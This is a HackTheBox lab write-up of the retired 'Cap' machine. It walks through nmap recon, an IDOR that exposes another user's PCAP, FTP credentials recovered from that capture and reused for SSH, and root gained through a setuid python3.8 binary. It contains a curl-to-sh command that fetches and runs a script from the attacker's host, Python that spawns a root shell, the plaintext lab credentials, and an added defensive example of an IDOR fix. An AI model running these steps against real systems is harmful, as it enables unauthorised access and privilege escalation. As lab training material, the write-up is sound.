Jacob Huggins

Security | Systems | Networks
Principal Security Consultant @ Catalytic IT
CISSP | OSCP+ | OSEP

17 January 2025

HTB - Machine 'Cap'

by Jacob Huggins


Summary

HTB Cap is ranked as an easy-difficulty Linux machine running a web server with an insecure direct object reference (IDOR) vulnerability. The site has PCAP collection functionality, which also allows downloading previously captured PCAPs stored on the server. Reviewing one of those previous PCAPs reveals user credentials that grant SSH access. With the foothold gained, privileges are escalated through excessive permissions configured on the python3.8 binary.


Machine Information

Name          Info
Machine Name  Cap
Difficulty    Easy
OS            Linux
Target IP     10.10.10.245
Retire Date   02 Oct 2021



Recon

Set the environment variable $ip to the target:

ip=10.10.10.245


NMAP

Set the env var $ports to the open ports found on the machine, scanning the top 1000 ports. I can expand this to all ports at the cost of time if I don't find anything useful.

ports=$(nmap $ip -Pn -T5 | grep '^[0-9]' | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)

Deeper nmap scan against the identified ports:

nmap -p $ports -sS -sV -sC -T5 -Pn $ip

Scan Output

I usually start by looking at open web servers, so let's start there.


HTTP

nmap shows port 80 is open and running a gunicorn web server. Browsing to http://10.10.10.245, I am presented with a dashboard.

Web Dashboard

Exploring the menu reveals an option to take a 5-second packet capture, which can then be downloaded for analysis.

Web PCAP

After running a few captures, I notice the ID in the URL increments with each capture.

Web PCAP

The first PCAP I ran had an ID of 1; changing this to 0 reveals a PCAP containing data that is not mine.

IDOR

This is an Insecure Direct Object Reference (IDOR) vulnerability: the capture ID from the URL is used directly to look up the file on the server, with no check that the requesting user owns that capture.
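As an added illustration (not the Cap application's own code), the core of a download handler with the IDOR described above beside a hardened version that scopes the lookup to the requesting user; the capture store, user names and handler names are assumed for the example.

```python
import secrets
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass
class Capture:
    owner: str   # user who triggered the capture
    pcap: bytes  # captured bytes (constructed sample data)


# Constructed sample store: sequential IDs handed out per capture, as on Cap.
CAPTURES: Dict[int, Capture] = {
    0: Capture(owner="admin", pcap=b"constructed: another user's capture"),
    1: Capture(owner="guest", pcap=b"constructed: guest traffic"),
}


def download_vulnerable(capture_id: int, requester: str) -> Optional[bytes]:
    """IDOR: the ID from the URL is used directly; the requester is never consulted."""
    cap = CAPTURES.get(capture_id)
    return cap.pcap if cap else None


def download_hardened(capture_id: int, requester: str) -> Optional[bytes]:
    """Ownership check: the capture is returned only if it belongs to the requester."""
    cap = CAPTURES.get(capture_id)
    if cap is None or cap.owner != requester:
        return None  # 'not yours' and 'does not exist' look identical to the caller
    return cap.pcap


# Defence in depth: an unguessable per-capture token removes the guessable
# sequential ID; the ownership check above still stays in place.
TOKENS: Dict[str, Capture] = {}


def new_capture(owner: str, pcap: bytes) -> str:
    token = secrets.token_urlsafe(16)
    TOKENS[token] = Capture(owner=owner, pcap=pcap)
    return token


def download_by_token(token: str, requester: str) -> Optional[bytes]:
    cap = TOKENS.get(token)
    if cap is None or cap.owner != requester:
        return None
    return cap.pcap
```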


Foothold

Downloading and opening the PCAP file for exploration reveals FTP traffic. Following the FTP TCP stream in the packet capture reveals the credentials used to authenticate, as FTP traffic is not encrypted.

FTP PCAP

nathan:Buck3tH4TF0RM3!

These credentials did not work for FTP, but they did work for SSH.

ssh nathan@$ip

SSH Success


Escalation

One of the first steps toward easy wins is running linPEAS. I download linpeas from my Kali machine and execute it in the SSH session.

curl http://10.10.16.5/linpeas.sh | sh

Linpeas Run

linpeas identifies the python3.8 binary as having the setuid permission.

Linpeas

The commands below, when executed inside the python3.8 interpreter, set the UID to 0 (root) and spawn a bash shell as root.

import os
os.setuid(0)          # become root; succeeds because of the binary's excessive permissions
os.system("/bin/bash")  # spawn a shell as root

Linpeas

tags: htb - easy - linux